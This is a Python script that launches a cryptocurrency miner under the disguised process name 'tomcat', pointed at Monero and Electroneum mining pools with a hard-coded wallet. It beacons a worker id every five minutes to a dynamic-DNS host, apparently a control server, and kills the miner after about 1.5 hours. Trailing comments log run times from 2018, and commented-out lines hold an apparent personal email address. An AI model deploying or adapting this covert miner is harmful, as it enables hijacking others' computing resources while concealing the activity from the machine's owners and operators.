import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:17:03.575347
#2018-02-17 17:04:01.560570
#2018-02-17 18:51:07.428577
#2018-02-17 20:41:03.808746
#2018-02-17 22:28:07.170304
#2018-02-18 00:11:03.674052
#2018-02-18 02:02:05.450178
#2018-02-18 03:49:03.500994
#2018-02-18 05:36:07.379175
#2018-02-18 07:29:04.014737
#2018-02-18 09:17:03.894199
#2018-02-18 11:03:04.946667
#2018-02-18 12:49:06.850449
#2018-02-18 14:37:05.882424
#2018-02-18 16:26:04.939728
#2018-02-18 18:15:06.325489
#2018-02-18 20:01:05.466515
#2018-02-18 21:48:01.518352
#2018-02-18 23:36:07.551664
#2018-02-19 01:22:04.953257
#2018-02-19 03:10:08.910764
#2018-02-19 04:55:06.679510
#2018-02-19 06:41:03.298489
#2018-02-19 08:30:09.439577
#2018-02-19 10:18:08.231028
#2018-02-19 12:06:09.515940
#2018-02-19 13:54:06.787110
#2018-02-19 15:42:09.026228
#2018-02-19 17:31:09.067561
#2018-02-19 19:18:02.189711
#2018-02-19 21:07:01.551983
#2018-02-19 22:53:07.152410
#2018-02-20 00:38:03.910259
#2018-02-20 02:27:06.463941
#2018-02-20 04:17:01.816172
#2018-02-20 06:01:03.675412
#2018-02-20 07:46:06.082856
#2018-02-20 09:29:06.430111
#2018-02-20 11:13:03.742403
#2018-02-20 13:01:01.232939
#2018-02-20 14:44:10.669528
#2018-02-20 16:29:07.416670
#2018-02-20 18:16:04.179636
#2018-02-20 20:06:09.815857
#2018-02-20 21:54:01.348231
#2018-02-20 23:34:05.880141
#2018-02-21 01:17:06.328019
#2018-02-21 03:05:09.088842
#2018-02-21 04:53:02.067552
#2018-02-21 06:41:01.831943
#2018-02-21 08:28:05.040118
#2018-02-21 10:13:02.171851
#2018-02-21 12:01:10.021675
#2018-02-21 13:49:07.348286
#2018-02-21 15:35:06.794284
#2018-02-21 17:24:06.144100
#2018-02-21 19:12:06.532127
#2018-02-21 20:58:05.102769
#2018-02-21 22:44:08.415821
#2018-02-22 00:36:07.920081
#2018-02-22 02:25:07.688982
#2018-02-22 04:12:01.443737
#2018-02-22 05:56:06.748121
#2018-02-22 07:42:08.391970
#2018-02-22 09:31:08.677634
#2018-02-22 11:17:07.316586
#2018-02-22 13:02:08.672925
#2018-02-22 14:51:04.845801
#2018-02-22 16:36:06.398450
#2018-02-22 18:21:08.908360
#2018-02-22 20:13:01.697601
#2018-02-22 21:58:07.874892
#2018-02-22 23:45:11.022670
#2018-02-23 01:34:07.836139
#2018-02-23 03:20:08.637765
#2018-02-23 05:06:07.090946
#2018-02-23 06:51:08.366222
#2018-02-23 08:43:05.997971
#2018-02-23 10:58:08.688637
#2018-02-23 12:55:08.130812
#2018-02-23 14:39:01.282739
#2018-02-23 16:28:09.558337
#2018-02-23 18:15:02.939635
#2018-02-23 20:00:09.455318
#2018-02-23 21:43:07.379093
#2018-02-23 23:35:07.168328
#2018-02-24 01:23:06.400735
#2018-02-24 03:13:07.575954
#2018-02-24 04:58:05.208404
#2018-02-24 06:48:07.033673
#2018-02-24 08:39:06.232259
#2018-02-24 10:23:03.745951
#2018-02-24 12:18:05.326277
#2018-02-24 14:11:06.541562
#2018-02-24 15:58:05.771845
#2018-02-24 17:49:07.479127
#2018-02-24 19:38:01.246656
#2018-02-24 21:25:05.907224
#2018-02-25 01:53:01.269615
#2018-02-25 04:59:02.201897
#2018-02-25 09:40:01.366474